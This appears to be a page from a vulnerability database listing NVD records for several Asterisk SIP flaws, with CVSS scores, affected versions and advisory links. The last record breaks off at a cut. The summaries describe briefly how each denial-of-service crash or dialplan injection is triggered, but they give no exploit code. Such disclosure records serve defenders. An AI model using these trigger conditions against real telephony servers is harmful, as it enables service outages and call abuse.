Modified

2024-11-21 06:06

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2021-007.html	Patch, Vendor Advisory
cve@mitre.org	http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html	Patch, Third Party Advisory, VDB Entry
cve@mitre.org	http://seclists.org/fulldisclosure/2021/Jul/48	Mailing List, Patch, Third Party Advisory
cve@mitre.org	https://downloads.digium.com/pub/security/AST-2021-007.html	Patch, Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-29381	Exploit, Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2021-007.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html	Patch, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2021/Jul/48	Mailing List, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.digium.com/pub/security/AST-2021-007.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-29381	Exploit, Issue Tracking, Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	16.17.0
digium	asterisk	16.18.0
digium	asterisk	16.19.0
digium	asterisk	18.3.0
digium	asterisk	18.4.0
digium	asterisk	18.5.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:16.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4793E23F-97F7-4F87-B521-1718AA6FAD06",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:16.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E01BD9F9-857A-4114-80D6-9F43B230EF3D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:16.19.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "00B876D8-5BE7-4F40-9692-4C7C6EE49611",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:18.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "78681A97-2B41-494E-AA7A-3BB953E8497B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:18.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "54266F33-D604-491F-9891-C9D8A1B68135",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:18.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F4CC9EFF-8916-46E6-97ED-39035541E350",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
    },
    {
      "lang": "es",
      "value": "Se ha detectado un problema en PJSIP en Asterisk versiones anteriores a 16.19.1 y versiones anteriores a 18.5.1. Para explotarlo, se debe recibir un re-INVITE sin SDP despu\u00e9s de que Asterisk haya enviado una petici\u00f3n BYE"
    }
  ],
  "id": "CVE-2021-31878",
  "lastModified": "2024-11-21T06:06:24.867",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-07-30T14:15:16.690",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Jul/48"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Jul/48"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-617"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2009-03-11 14:19

Modified

2024-11-21 01:01

Severity ?

Summary

The SIP channel driver in Asterisk Open Source 1.4.22, 1.4.23, and 1.4.23.1; 1.6.0 before 1.6.0.6; 1.6.1 before 1.6.1.0-rc2; and Asterisk Business Edition C.2.3, with the pedantic option enabled, allows remote authenticated users to cause a denial of service (crash) via a SIP INVITE request without any headers, which triggers a NULL pointer dereference in the (1) sip_uri_headers_cmp and (2) sip_uri_params_cmp functions.

References

URL	Tags
cve@mitre.org	http://bugs.digium.com/view.php?id=13547
cve@mitre.org	http://bugs.digium.com/view.php?id=14417
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2009-002.html	Patch, Vendor Advisory
cve@mitre.org	http://osvdb.org/52568
cve@mitre.org	http://secunia.com/advisories/34229	Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/archive/1/501656/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/34070	Patch
cve@mitre.org	http://www.securitytracker.com/id?1021834
cve@mitre.org	http://www.vupen.com/english/advisories/2009/0667
af854a3a-2127-422b-91ae-364da2661108	http://bugs.digium.com/view.php?id=13547
af854a3a-2127-422b-91ae-364da2661108	http://bugs.digium.com/view.php?id=14417
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2009-002.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/52568
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/34229	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/501656/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/34070	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1021834
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2009/0667

Impacted products

Vendor	Product	Version
digium	asterisk	1.4.22
digium	asterisk	1.4.23
digium	asterisk	1.4.23.1
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0.1
digium	asterisk	1.6.0.2
digium	asterisk	1.6.0.3
digium	asterisk	1.6.0.3
digium	asterisk	1.6.0.4
digium	asterisk	1.6.0.5
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	c.2.3

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "D4333904-9D21-4149-965F-F49F0A34BD85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B10AE4B-EC2D-4D5B-B842-50F5097A0650",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "080C7089-5662-4A94-9842-C4A26095DA4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8374B5D-DE7A-4C3C-A5FE-579B17006A54",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "C7494CE2-D3CC-404D-BE61-09A2E1FB3E47",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "06E48482-D9AF-4038-80DA-27D9B4907C0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "9BC3C441-290F-471A-BA19-6B1C4D72A670",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "632ED295-B67D-43CF-BF38-CCE04088BA08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "50F3835F-6F2B-4EA7-B111-3B3C26548BC1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta6:*:*:*:*:*:*",
              "matchCriteriaId": "0DCF7BD2-7903-4DC5-ADDC-EFCDC58736C5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta7:*:*:*:*:*:*",
              "matchCriteriaId": "E5BECFE0-286F-4DA1-8CA9-6CEE861C3012",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta7.1:*:*:*:*:*:*",
              "matchCriteriaId": "AFFF3245-2D0F-46E3-A1D6-319086489DC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta8:*:*:*:*:*:*",
              "matchCriteriaId": "C91F2524-99D1-4C4B-9A31-21C0FB8B4D5F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta9:*:*:*:*:*:*",
              "matchCriteriaId": "7B1BC0FF-9DB6-4FCC-A845-053943CF0D24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "419D4D16-E790-4872-B9AF-1320978768C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "73D30BA6-1EE0-4C3F-8F69-65C698A1B9A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D39FA25D-AB56-470D-94AB-14446DB7D475",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4225252F-5960-4A42-A575-00C125860E89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "A65D76A8-BBDD-4BDE-B789-D745C400DCBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A8B0F5A5-4252-4A9C-B830-2419E87AE5A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F9085056-3BE9-4309-9601-9CA0569BC215",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D8432455-9064-479F-B060-BF2A74ECC3EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E8EF2D7-371B-4268-989E-25225CC1F7B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBFF2686-0F5C-4F20-AA93-6B63C5ADCD82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "6D4A9B22-7978-44F3-A30C-65FE7024AB6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "06219062-9CAD-49D2-823E-E11E74B131D8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "91420C0D-C63B-4916-8335-6BE24EB738FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "FD1D7D08-AC94-49AC-9F16-A6E91F1F1EEE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "05FDA8EA-6610-4D49-9825-34EBFAAD2691",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "3FA908BA-BEF8-44A5-AC95-E7CF020D0C94",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The SIP channel driver in Asterisk Open Source 1.4.22, 1.4.23, and 1.4.23.1; 1.6.0 before 1.6.0.6; 1.6.1 before 1.6.1.0-rc2; and Asterisk Business Edition C.2.3, with the pedantic option enabled, allows remote authenticated users to cause a denial of service (crash) via a SIP INVITE request without any headers, which triggers a NULL pointer dereference in the (1) sip_uri_headers_cmp and (2) sip_uri_params_cmp functions."
    },
    {
      "lang": "es",
      "value": "El controlador de canal SIP en Asterisk Open Source v1.4.22, v1.4.23, y v1.4.23.1; v1.6.0 anterior a v1.6.0.6; v1.6.1 anterior a v1.6.1.0-rc2; y Asterisk Business Edition C.2.3, con la opci\u00f3n \"pedantic\" activada, permite a usuarios autenticados remotamente provocar una denegaci\u00f3n de servicio (ca\u00edda) a trav\u00f1es de una petici\u00f3n SIP INVITE sin cabecera, lo que dispara una deferencia a puntero NULL en las funciones (1) sip_uri_headers_cmp y(2) sip_uri_params_cmp."
    }
  ],
  "id": "CVE-2009-0871",
  "lastModified": "2024-11-21T01:01:06.803",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 3.5,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2009-03-11T14:19:15.420",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://bugs.digium.com/view.php?id=13547"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://bugs.digium.com/view.php?id=14417"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2009-002.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/52568"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/34229"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/501656/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/34070"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1021834"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2009/0667"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://bugs.digium.com/view.php?id=13547"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://bugs.digium.com/view.php?id=14417"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2009-002.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/52568"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/34229"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/501656/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/34070"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1021834"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2009/0667"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2018-02-22 00:29

Modified

2024-11-21 04:11

Severity ?

6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. res_pjsip allows remote authenticated users to crash Asterisk (segmentation fault) by sending a number of SIP INVITE messages on a TCP or TLS connection and then suddenly closing the connection.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2018-005.html	Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/103129	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id/1040417	Third Party Advisory, VDB Entry
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27618	Vendor Advisory
cve@mitre.org	https://www.debian.org/security/2018/dsa-4320	Third Party Advisory
cve@mitre.org	https://www.exploit-db.com/exploits/44181/	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2018-005.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/103129	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1040417	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27618	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2018/dsa-4320	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/44181/	Exploit, Third Party Advisory, VDB Entry

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	13.19.1
digium	certified_asterisk	*
debian	debian_linux	9.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BBC6235-486B-46AE-96C1-A8F5B68A1D96",
              "versionEndIncluding": "14.7.5",
              "versionStartIncluding": "14.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D63485A9-4464-49C7-ACF8-826303D8C152",
              "versionEndIncluding": "15.2.1",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "22A0ED4E-446A-4315-BE3A-8647F0ECC624",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "56E4037E-1F6F-4E1A-8549-38219F0A8E91",
              "versionEndIncluding": "13.18",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. res_pjsip allows remote authenticated users to crash Asterisk (segmentation fault) by sending a number of SIP INVITE messages on a TCP or TLS connection and then suddenly closing the connection."
    },
    {
      "lang": "es",
      "value": "Se ha descubierto un problema en Asterisk hasta la versi\u00f3n 13.19.1, versiones 14.x hasta la 14.7.5 y versiones 15.x hasta la 15.2.1; as\u00ed como Certified Asterisk hasta la versi\u00f3n 13.18-cert2. res_pjsip permite que usuarios remotos autenticados provoquen el cierre inesperado de Asterisk (fallo de segmentaci\u00f3n) mediante el env\u00edo de mensajes SIP INVITE en una conexi\u00f3n TCP o TLS para despu\u00e9s cerrar la conexi\u00f3n repentinamente."
    }
  ],
  "id": "CVE-2018-7286",
  "lastModified": "2024-11-21T04:11:56.600",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-02-22T00:29:01.110",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2018-005.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/103129"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1040417"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27618"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2018/dsa-4320"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/44181/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2018-005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/103129"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1040417"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27618"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2018/dsa-4320"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/44181/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2010-02-23 20:30

Modified

2024-11-21 01:12

Severity ?

Summary

The design of the dialplan functionality in Asterisk Open Source 1.2.x, 1.4.x, and 1.6.x; and Asterisk Business Edition B.x.x and C.x.x, when using the ${EXTEN} channel variable and wildcard pattern matches, allows context-dependent attackers to inject strings into the dialplan using metacharacters that are injected when the variable is expanded, as demonstrated using the Dial application to process a crafted SIP INVITE message that adds an unintended outgoing channel leg. NOTE: it could be argued that this is not a vulnerability in Asterisk, but a class of vulnerabilities that can occur in any program that uses this feature without the associated filtering functionality that is already available.

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2010-002.html	Exploit, Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html
cve@mitre.org	http://secunia.com/advisories/38641	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/39096
cve@mitre.org	http://svn.asterisk.org/svn/asterisk/branches/1.2/README-SERIOUSLY.bestpractices.txt
cve@mitre.org	http://www.securityfocus.com/archive/1/509608/100/0/threaded
